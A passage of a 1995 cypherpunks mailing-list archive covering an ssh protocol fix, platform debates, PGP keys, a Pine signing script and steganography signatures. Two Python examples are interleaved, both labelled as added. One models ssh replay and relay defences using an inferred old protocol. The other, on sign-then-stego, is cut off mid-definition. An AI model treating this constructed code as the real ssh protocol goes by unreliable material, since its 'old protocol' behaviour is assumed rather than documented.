client displays a warning (recommending to update server software) and
uses the old protocol for compatibility.  The client reports the
protocol version that it will use.  The compatibility code will be
removed in a later release.  (The changes are easy to implement
compatibly.)

I would like to receive comments on this.

    Tatu
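
The session-id binding proposed in the message above, as an added Python example (not code from ssh or from the message's author). It assumes the RSA layer is transparent and leaves it out; the function names, the 8-byte cookies, the 32-byte session key and all sample values are constructed for illustration, and the "old" response (MD5 of the challenge alone) is inferred from the message's wording.

```python
import hashlib
import hmac


def session_id(modulus: int, cookie: bytes) -> bytes:
    """MD5 over the public-key modulus (bytes, msb first) followed by the cookie."""
    mod_bytes = modulus.to_bytes((modulus.bit_length() + 7) // 8, "big")
    return hashlib.md5(mod_bytes + cookie).digest()  # 128 bits = 16 bytes


def xor_first16(session_key: bytes, sid: bytes) -> bytes:
    """XOR the first 16 bytes of the session key with the session id.

    XOR is its own inverse, so the client calls this before RSA encryption
    and the server calls it again after RSA decryption.  Bytes from offset
    16 onward pass through unchanged.
    """
    if len(sid) != 16 or len(session_key) < 16:
        raise ValueError("need a 16-byte session id and a key of >= 16 bytes")
    head = bytes(k ^ s for k, s in zip(session_key[:16], sid))
    return head + session_key[16:]


def rsa_response(challenge: bytes, sid: bytes) -> bytes:
    """MD5 over the decrypted challenge followed by the session id (48 bytes)."""
    if len(challenge) != 32:
        raise ValueError("decrypted challenge must be 32 bytes")
    return hashlib.md5(challenge + sid).digest()


def server_accepts(challenge: bytes, sid: bytes, response: bytes) -> bool:
    """Server-side check: recompute the expected response and compare."""
    return hmac.compare_digest(rsa_response(challenge, sid), response)


def _fake_modulus(label: bytes) -> int:
    # Constructed stand-in for an RSA modulus: 1024 bits of hash output.
    return int.from_bytes(hashlib.sha256(label).digest() * 4, "big") | 1


def demo_replay():
    """A recorded SSH_CMSG_SESSION_KEY payload replayed on a new connection."""
    modulus = _fake_modulus(b"constructed server key")
    cookie_1 = bytes.fromhex("0102030405060708")   # recorded connection
    cookie_2 = bytes.fromhex("1112131415161718")   # later connection
    key = bytes(range(32))                          # constructed session key

    # What the client puts inside the RSA encryption on connection 1.
    wire = xor_first16(key, session_id(modulus, cookie_1))

    same_conn = xor_first16(wire, session_id(modulus, cookie_1))
    replayed = xor_first16(wire, session_id(modulus, cookie_2))
    # The server recovers the real key only when the cookie matches, so
    # traffic recorded under `key` does not decrypt on the new connection.
    return same_conn == key, replayed == key


def demo_cross_server():
    """A response produced for server B presented to server A."""
    sid_a = session_id(_fake_modulus(b"server A"), bytes.fromhex("a1a2a3a4a5a6a7a8"))
    sid_b = session_id(_fake_modulus(b"server B"), bytes.fromhex("b1b2b3b4b5b6b7b8"))
    challenge = hashlib.sha256(b"constructed challenge from A").digest()

    # Protocol 1.0 as implied by the message: MD5 of the challenge alone,
    # so the value is the same no matter which server the client talks to.
    old_response = hashlib.md5(challenge).digest()
    old_accepted = hmac.compare_digest(hashlib.md5(challenge).digest(), old_response)

    # Protocol 1.1: the client, connected to B, mixes in B's session id.
    new_response = rsa_response(challenge, sid_b)
    new_accepted = server_accepts(challenge, sid_a, new_response)
    return old_accepted, new_accepted


if __name__ == "__main__":
    print("replay  (same connection ok, replay ok):", demo_replay())
    print("relay   (old accepted, new accepted):   ", demo_cross_server())
```
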




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 15 Jul 95 18:19:26 PDT
To: "Rev. Mark Grant" <cypherpunks@toad.com
Subject: Re: Deployment
Message-ID: <199507160119.SAA10662@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 PM 7/15/95 +0100, Rev. Mark Grant wrote:
>
>So, anyone want to volunteer to port Privtool to Windows ?

Uh, pardon my ignorance, but what is privtool, and why is it
a good thing to port it to windows?

(As compared to the task of integrating PGP into Microsoft's
mail tool.)
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 16:25:04 PDT
To: tcmay@sensemedia.net
Subject: Unix not the Only Place for "Vanguard" Applications
In-Reply-To: <ac2d93b913021004f19f@[205.199.118.202]>
Message-ID: <199507152320.AA05094@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of
   the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even
   recollect who was who in this battle). Maybe it was the News vs. X vs.
   OpenLook vs. NeXTStep vs. etc. user interface battles.

Well, it looks like there will be a major Unix mainstream again
with two branches capable of more-or-less running each other's
binaries without too much pain: FreeBSD and Linux.

   In any case, I expect Windows (and Windows NT) will take an ever-increasing
   share of the market for at least the next several years. I'm hardly alone
   in this expectation.

BTW, I hear Linux can now run Windows 3.1 in its DOS box.

Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sat, 15 Jul 95 18:36:09 PDT
To: alex <cypherpunks@toad.com
Subject: Re: Unix not the Only Place for "Vanguard" Applications
Message-ID: <ac2db8a0140210049d2e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 AM 7/16/95, alex wrote:
>MS-Windows boxes and Macs still don't do multitasking well;  that's going

Agreed, certainly.

>The preeminence of unix in a lot of the work that's being done isn't the
>result of snobbishness or even personal taste.  It's just a nice,
>convenient platform to do the work on.

I certainly would never say the success of Unix is due to snobbishness,
though personal taste does play a role. And, historically, the
academic/pedantic aspects of Unix played a role in its adoption.

(Most important, I think, was that the proliferation of minicomputer and
mainframe operating systems was controlled by Unix killing off all the
proprietary, vendor-specific OSs.)

>People pick the tools they feel comfortable using, and they match them to
>the job at hand.  I can't run Pagemaker on my linux box so if I need to do
>some layout work I use a mac or ms-windows.  But if I want to set up a web
>server I use linux because it's quick and cheap.  If you want to edit a
>feature film, use an SGI workstation.  If you want to set up a word
>processing system that someone from the temp service will be able to run,
>use ms-windows and word.

Sure. Same here. All I was addressing was the claim that no vanguard apps
ever appear on PCs, that Unix is where it all happens.

>I'm sure that when windows-95 comes out officially, good tools will appear
>for that platform.  But the lack of solid multitasking and freely
>available development tools in ms-windows 3.11 is the reason that more
>robust crypto tools for that platform don't exist, not an ivory tower
>mentality on the part of the people doing the work.

I certainly have not claimed that. In fact, I'll be the first to concede
that Mac users are more ivory tower types, in the sense of being fanatics
and advocates for their platform. (Though there are some Unix bigots out
there, notably now on Linux....I don't see Linux making any strides in the
workstation (SGI, Sun) market, just on the cheap Intel-based boxes
people--mostly non-corporate, it seems to me--are buying.)

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 17:00:22 PDT
To: cypherpunks@toad.com
Subject: Finally got pgp... here's my key.
Message-ID: <199507152356.AA07171@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I know, it's not really signed/verified, but it'll
have to do for now.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAIbBcAAAEEANGhGNu6EcmxoqUC/1dHz+ZJinZIXJ1tyrsGdw2vR76uymqn
hYGIzxFTAvB2WMZMko/6VEYOLXF8i6CUrZOg/ojzbExcaS9wYeBsNzY3FsjvEbfI
v0kSIn8bN8YTdUO/OQ1HBgMUvUAGkTaac+hbM9Nxsj1mL8yCM+DFwYBSGL/hAAUR
tCdQaGlsaXAgR2VyYXJkIEZyYWVyaW5nIDxwZ2ZAdHlyZWxsLm5ldD4=
=T1NA
-----END PGP PUBLIC KEY BLOCK-----

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Sat, 15 Jul 95 17:19:37 PDT
To: cypherpunks@toad.com
Subject: Re: Unix not the Only Place for "Vanguard" Applications
In-Reply-To: <199507152320.AA05094@tyrell.net>
Message-ID: <199507160024.TAA05082@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


MS-Windows boxes and Macs still don't do multitasking well;  that's going
to change soon, and when it does, I'm sure that a lot of nifty new tools
will appear.  But multitasking is important if you want to run servers
(like remailers), and it's very helpful if you want to tie different
programs together (ie., elm talks to premail which starts pgp 5 times and
hands the result to sendmail, all without my noticing). 

The preeminence of unix in a lot of the work that's being done isn't the
result of snobbishness or even personal taste.  It's just a nice,
convenient platform to do the work on.  

People pick the tools they feel comfortable using, and they match them to
the job at hand.  I can't run Pagemaker on my linux box so if I need to do
some layout work I use a mac or ms-windows.  But if I want to set up a web
server I use linux because it's quick and cheap.  If you want to edit a
feature film, use an SGI workstation.  If you want to set up a word
processing system that someone from the temp service will be able to run,
use ms-windows and word.

I'm sure that when windows-95 comes out officially, good tools will appear
for that platform.  But the lack of solid multitasking and freely
available development tools in ms-windows 3.11 is the reason that more
robust crypto tools for that platform don't exist, not an ivory tower
mentality on the part of the people doing the work.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 15 Jul 95 21:04:29 PDT
To: cypherpunks@toad.com
Subject: re: unix, vanguard
Message-ID: <199507160403.VAA04878@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>The preeminence of unix in a lot of the work that's being done isn't the
>result of snobbishness or even personal taste.  It's just a nice,
>convenient platform to do the work on.  

There is a well written essay on the "preeminence of unix" at
http://gnn.com/gnn/bus/ora/features/history/index.html.  It
essentially says Unix has survived for so long because universities use
it, and you could license it fairly cheap.  Most people (I'm talking
about 90% of computer users, even more in the future) couldn't care
less about features such as tying apps together with shell scripts, 
pipes, and some bubble gum.

>But the lack of solid multitasking and freely available development 
>tools in ms-windows 3.11 is the reason that more robust crypto tools 
>for that platform don't exist.

What are some "robust crypto tools" that are available for unix, and also
aren't available for DOS/Windows?

I kinda think the reason more tools aren't available for PCs (Windows/Mac)
is because there is no appreciable MARKET for such tools yet.  If there
were, since PCs have a market share an order of magnitude or two larger
than unix, such tools would have a greater influence anyway.  
--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex McLean <alex@forestbk.demon.co.uk>
Date: Sat, 15 Jul 95 14:16:10 PDT
To: cypherpunks@toad.com
Subject: Uk hackers
Message-ID: <88422937wnr@forestbk.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

We're preparing to send a press release to all the UK newspapers and 
magazines that we can afford, on the subject of hackers.  So far there 
haven't been many attacks by the media on this often misrepresented 
group, and we hope to start building a good relationship between 
hackers and the media while it is still possible.

We plan to send them a comprehensive letter offering an alternative to 
the hacker stereotype, and maybe a floppy disk containing a few usenet 
faq files on the subject.

If you have any ideas, suggestions or contributions to this effort, I'd 
very much like to hear from you.

I'd also like to hear from you if you are a journalist yourself, and 
would like a copy of our release once it is done, or further 
information about our cause.

Or if you'd just like a chat about this subject (wherever you are), 
feel free to mail me.

Thanks,


Alex

-- 
All generalisations are false.  That last sentence isn't a paradox of 
self-reference, and neither is this one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <mazieres@pa.dec.com>
Date: Sat, 15 Jul 95 23:20:57 PDT
To: ylo@cs.hut.fi
Subject: Re: Ssh "security hole": proposed fix
In-Reply-To: <199507151502.SAA01269@shadows.cs.hut.fi>
Message-ID: <9507160615.AA06186@venus.pa.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, here is the proposed new ssh protocol as I understand it.

  A -> B: A
  
  B -> A: PKb, PKsb, Cb

    session_id := {PKb, PKsb, Cb}_MD5
  
  A -> B: Cb, {{session_id XOR Kab}_PKsb}_PKb        (*)
  A -> B: {A}_Kab
  A -> B: {PKa}_Kab
  
  B -> A: {{Nb}_PKa}_Kab
  
  A -> B: {{Nb, session_id}_MD5}_Kab

It does seem to solve the two problems I pointed out.  However, I am
troubled by how complicated the protocol is, and how much encryption
is going on.  One of the principles I have heard stated says that more
encryption does not mean more security.  A good example of that seems
to be the session key PKsb above.

In line (*) of the protocol, you say the session key (or now I guess
really session_id XOR Kab) is encrypted first with whichever of Kb,
Ksb has the larger modulus.  Under normal circumstances (the ones
depicted above), the first encryption will be with PKsb.  However, if
ever PKb were to come first, then PKsb would be completely vulnerable
to a "man in the middle" attack, and thus would be completely useless.

Wouldn't it make sense to simplify the protocol significantly, so as
to make it easier to understand and easier for us to convince
ourselves of its robustness?  What about something like what follows
this message?

To come up with the protocol I appended, I took your protocol and
stuck the full context of each message into the message itself, so
that none of the previous problems could occur.  Then I eliminated all
complications like double encryption and challenges that did not add
to the security of the protocol.  Now granted I'm no authentication
expert and could easily have made a mistake here, but at least it will
be easier to catch because the protocol is simpler.  Who knows what the
implications of that XOR really are?

David


PREAMBLE:

(1)  A -> B: A

(2)  B -> A: Cb, PKsb, PKb

(3)  A -> B: {Kab}_PKsb, {A, B, Cb}_Kab

(4)  B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab


SSH_AUTH_RHOSTS:

(5)  A -> B:  0

SSH_AUTH_RHOSTS_RSA:
SSH_AUTH_RSA:

(5)  A -> B: {{A, B, Cb, Kab}_SKa, PKa}_Kab

SSH_AUTH_PASSWORD:

(5)  A -> B: {Ka}_Kab




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sat, 15 Jul 95 21:46:30 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PINESIGN:  Simple Script for Signing Pine Email
Message-ID: <Pine.ULT.3.91.950715233427.26104A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I liked using the mkpgp program for signing email, but found that, quite 
frankly, it had too many features for me to use, when really all I wanted 
was a program that would sign my messages easily.  This accomplishes just 
that.  If you want to encrypt messages, either use mkpgp or encrypt your 
messages outside of pine.

Instructions are provided as comments within the script.

Let me know if you have any problem.

============ ** CUT HERE **

#!/bin/sh

# PINESIGN v1.0
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.89 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature in your $HOME directory.  
# Default editor is pico -z -t.

SIGPATH=$HOME/.signature
PINEEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to sign the message.  If you respond with y, Y or just 
# press return, you will be prompted for your PGP passphrase and then 
# dumped back to the address/subject section of Pine.  If you type 
# anything else, your message will not be signed.  Your .signature file 
# will be appended AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your .signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that you define your alternate
# editor to run implicitly. 

###  DO NOT EDIT ANYTHING BELOW THIS LINE  ###

# $PINEEDITOR is deliberately left unquoted so that its options are split
# into separate arguments; the message file name is always quoted.
$PINEEDITOR "$1"
clear
printf "Would you like to sign this message with your PGP signature? [y] "
read ANS

# Sign on y, Y or a bare return.  The signed copy replaces the message
# only if pgp succeeded, so a failed signing leaves the text untouched.
case "$ANS" in
	y|Y|"")
		pgp -sat +comment="PGP Signed with PineSign 1.0" "$1" &&
			mv "$1.asc" "$1"
		;;
esac

echo " " >> "$1"
# Append the .signature file only if it exists.
if [ -f "$SIGPATH" ]
	then cat "$SIGPATH" >> "$1"
fi

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAiZnTokqlyVGmCFAQGEdwP/bEpO7xcABhc5RTmWg0zfB+42r7GJyURJ
b4x36dudJfHV5BWnwS3hK3OyunalPkTjIjoztG5pANL1FU9OWqP3fNqedYzXTzy5
uhmWqVQ40znnDc4iipTRenUZgjI4x7BuXIh+CRoYJ3rvPuvc73ZARRaYzlpgxDBT
M1m8RSeMrhE=
=kA0H
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sat, 15 Jul 95 18:02:04 PDT
To: cypherpunks@toad.com
Subject: Front-End for OS/2
Message-ID: <9507160037.AA12722@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Here is a front end for integrating PGP management into the Enhanced
Editor that comes with OS/2 WARP at no extra charge.  The integration
is via a new PGP menu bar item that manages PGP commands with mouse
clicks and hides most of the offputting command-line difficulties.

This file does not contain PGP itself.  The package is a macro only.

Enjoy and imitate!



----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 16 Jul 95 10:31:39 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507142311.AA09635@tis.com>
Message-ID: <Pine.D-G.3.91.950716003841.26405B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Carl Ellison wrote:
...
> Meanwhile, the Federal civil forfeiture fund goes to good things.  The last
> $9M (I believe it was) went to buying up AT&T DES phones to be made into
> Clipper phones.  Of course, the conversion hasn't happened yet and the DES
> phones are sitting in a warehouse someplace -- but the $9M fund went to
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Nope.  There is one right here in my office.  And it makes me feel so 
safe and secure.

Seriously, I have used it in secure mode once -- to test it.  I'd be more 
likely to use my STU-III if I really want to be secure.


> really good use, saving the world from AT&T DES.
> 
> (sarcasm off)
> 
> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
> |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
> |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
> +----------------------------------------------------------- Jean Ellison -+

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Sat, 15 Jul 95 22:45:21 PDT
To: cypherpunks@toad.com
Subject: Re: unix, vanguard
In-Reply-To: <199507160403.VAA04878@jobe.shell.portal.com>
Message-ID: <199507160550.AAA05385@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> What are some "robust crypto tools" that are available for unix, and also
> aren't available for DOS/Windows?

Mixmaster, CFS, premail, the alias system at alpha.c2.org, etc.

I know there are similar versions of some of these on pc boxes (sfs, 
secure drive, and private idaho), and those are good packages.  But using 
private idaho on a pc is still a lot more of a hassle than using premail 
on a unix box (the latter can be completely transparent), and although I 
haven't seen the source code to private idaho, I'll be willing to bet 
it's a lot more complicated than the premail script.

If you want to do something like Raph's remailer list, would you rather 
implement it on a pc running windows or with a perl script on a unix 
box?

SFS is a great program, it works well, and it's very useful.  But the 
design of CFS, which runs as an NFS server, is more elegant.  Would you 
rather drop a new cipher into secure drive or sfs, or into CFS?

> I kinda think the reason more tools aren't available for PCs (Windows/Mac)
> is because there is no appreciable MARKET for such tools yet.  If there
> were, since PCs have a market share an order of magnitude or two larger
> than unix, such tools would have a greater influence anyway.  

Did the market produce these unix tools?  If Zimmermann was a 
businessman, wouldn't he have produced weak exportable code?  Sometimes 
innovative products create the market, rather than the other way around.  
If there's a market for remailers, I'm inclined to think it's because we 
were able to glimpse the possibilities thanks to the original perl based 
type I remailer.

As I said before, unix has a lot of problems.  It's a crummy os if you
want to write letters or do desktop publishing:  even if you have good
software to do these things, the system's going to cost you too much if
that's all you're using your computer for.  But if you have an idea for a
remailer and you'd like to throw something together over a weekend that
will work, it's hard to beat it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 16 Jul 95 01:18:30 PDT
To: cypherpunks@toad.com
Subject: Re: Unix not the Only Place for "Vanguard" Applications
Message-ID: <199507160827.EAA00243@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks, as they say, write code.

It doesn't really matter very much what platform cypherpunks write
code for, as long as we actually write code.  Progress comes from
getting stuff done and making results available so that others can
expand on it and use it, not from sitting around optimizing what
should be done (by others, of course) in the future.  (Ever notice
how, every time this comes up, the question is always something
like "why aren't people writing more software for platform X?" and
never "I want to write some software - does anyone have any
suggestions on which platform would have the most impact?")

Every minute spent arguing about whether Unix, DOS, Macs or VIC-20s
constitute the optimal platform for writing and deploying crypto
software is a minute during which no crypto code is being written
or deployed for Unix, DOS, Macs, or VIC-20s.

Just write code.  For whatever platform you like writing code for.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 18 Jul 95 08:00:25 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Deployment
In-Reply-To: <199507160119.SAA10662@blob.best.net>
Message-ID: <Pine.3.89.9507161551.A1196-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 15 Jul 1995, James A. Donald wrote:

> Uh, pardon my ignorance, but what is privtool, and why is it
> a good thing to port it to windows?

It's a PGP-aware mailer for SunOS/Linux, and has the most
highly-integrated PGP interface that I know of (e.g. just tick a
check-box to encrypt/sign/remail). Even a newbie Windows user can handle
that much.. 

> (As compared to the task of integrating PGP into microsofts
> mail tool.)

Well, someone's (mm@qpsx.oz.au, dunno if they're on the list) already done 
that for MS-Mail, at least in Beta form, according to their article on 
alt.security.pgp... However, their message implies that you have to use 
extra commands on the menus in order to deal with PGP mail, it's not 
just there waiting for you to tick the box..

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 16 Jul 95 06:24:19 PDT
To: cypherpunks@toad.com
Subject: FAM_15\"
Message-ID: <199507161324.JAA26100@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-16-95. NYPaper:


   "New Concerns Raised Over a Computer Smut Study. 'They
   wanted to be famous.' It worked."

      Growing controversy over a widely publicized study of
      on-line computer pornography, conducted by a researcher
      at Carnegie Mellon University, has prompted the
      university to investigate whether the research violated
      ethical or academic guidelines. The investigation
      follows the disclosure by angry faculty members that an
      undergraduate student and his principal faculty adviser
      at Carnegie Mellon spied on the private computer habits
      of nearly 3,000 students, staff members and other
      faculty members last year as part of the research study
      into pornography viewing habits.               KEY_hol


   "Documents Were Destroyed as F.B.I. Resisted Siege
   Investigation. Hints of a cover-up: more embarrassment over
   a fatal confrontation."

      A Justice Department report not yet made public on the
      F.B.I.'s standoff with a white separatist in Idaho shows
      that in late 1992 and early 1993 F.B.I. managers were
      frantically trying to block Federal prosecutors from
      obtaining the Bureau's records on the case. Justice
      Department investigators, who uncovered the document
      destruction, have found that a career F.B.I. official
      stripped the files of official records that would have
      clearly shown if top F.B.I. officials in Washington were
      in command of the operation.                   FOL_hah


   Siamese:  FAM_15"











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:16 PDT
To: CYPHERPUNKS@toad.com
Subject: Root Causes
Message-ID: <8AD5238.000300015C.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DK> It would seem that things such as the CDA, etc, are patent violations of the
DK> Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
DK> measures be violating our civil rights, and thus be criminally liable?

  Congressional Immunity.

DK> IANAL, of course, so I'll leave it up to those on the list who are to

  IANAL, either.  But I have a thought, myself:

     [Please do not start an abortion flamefest on the list. If you want
     to argue it via Imail, I can handle that, but let's not bother the
     rest of the class, OK?]

  The Supremes found the right to have an abortion in some kind of
"penumbral" right to <BOLD> privacy </BOLD>, which in turn came from
Griswold v. Connecticut, if organic RAM serves. Given this precedent,
may we challenge anti-crypto crap such as the Grassley Bill as a
violation of the right to privacy?


 * Recursion: See "recursion".
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:20 PDT
To: CYPHERPUNKS@toad.com
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <8AD5238.000300015E.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DM> however, would be unobtrusive. A web page that mails a form letter to
DM> _your_ congressperson's form-letter-readers (ie staff readers) would be
DM> much better, IMHO.

  Especially if the form letter generated would be randomly selected
from parallel word streams.  For example:

       Dear Senator <#SENATOR>:

       I am <concerned|alarmed|frightened> by the <attacks on privacy
     rights in|glaring First Amendment violations in|fascist mentality
     of|ominous provisions of|potential for civil rights infringement
     by> SB <#BILLNO> <introduced recently| proposed|offered> by Senator
     <#ORIGINATOR>.....

  You get the idea.

  Anyone who has read MAD Magazine could put such together. As an added
bonus, use variable margin settings, and none of the letters would be
exactly the same. Appropriate Imail => FAX software on a puter in DC
(local call that way) with the phone number of the sender filled in on
the top line for ID (izzat legal?) so it doesn't look like a form letter
at all.

  The web page would generate a random letter, allow the user to edit
it further (possibly offering the alternate phrases) before he clicks
on the [Send] button.


 * Len Buckholtz of Borg:
LB> Quoting is irrelevant.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:09 PDT
To: CYPHERPUNKS@toad.com
Subject: DOJ Press Release, S. 974?
Message-ID: <8AD5238.000300015B.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


JY>    According to the Computer Emergency Response Team at
JY>    Carnegie Mellon University, during the past four years, the
JY>    number of reported intrusions on the Internet has increased

  In the wake of the Rimm Job, any study from CMU is suspect.


 * Bad Borg, Bad Borg:
Whatcha gon' do? Whatcha gon' do when they 'simlate you?
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:04 PDT
To: CYPHERPUNKS@toad.com
Subject: Stego Standards Silly ? (
Message-ID: <8AD5238.000300015F.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


LM> The standard answer to agent-in-the-middle tampering is of
LM> course digital signatures. Now, the question is, will we be allowed to sign
LM> our possibly-stego-enclosing GIFs with reasonable confidence that the govt.
LM> can't forge our signatures ? Obviously the signature itself can't be
LM> stegoed, or else we fall into an infinite regress.

  Not obvious at all. You encrypt and sign as usual, stego the resultant
output, and perhaps include in the stego routines some kind of CRC or
hash if you like. But the point is that the signature still works to
indicate whether the message was tampered with or not.

  If we posit a MITM, he can tamper with cyphertext =or= stegotext, but
he can't defeat the signature. I would receive a GIF which my stego
software would turn into a file that PGP would puke on, telling me that
Someone Is Messing With My Mail.

  I would not, of course, be able to reveal this fact directly. However,
I could ask my correspondent to re-send the GIF, and when it comes out
different in EVERY SINGLE LSB, I have proof of tampering.

 * Support legislation for a waiting period on taglines.......
---
 * Monster@FAmend.Com *    
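
The sign-then-stego ordering described in the message above, as an added example that is not part of the original post: the payload is authenticated first and only then written into the least-significant bits of the cover, so any rewrite of the LSBs in transit is caught when the extracted payload is verified. Assumptions: HMAC-SHA256 under a shared key stands in for the PGP signature, encryption is omitted, the cover is a constructed byte array rather than a real GIF, and every function name is hypothetical.

```python
import hashlib
import hmac
import random

TAG_LEN = 32  # HMAC-SHA256 output size in bytes


def sign(key: bytes, msg: bytes) -> bytes:
    # Assumption: HMAC stands in for the PGP signature discussed in the message.
    return hmac.new(key, msg, hashlib.sha256).digest()


def embed(cover: bytes, payload: bytes) -> bytes:
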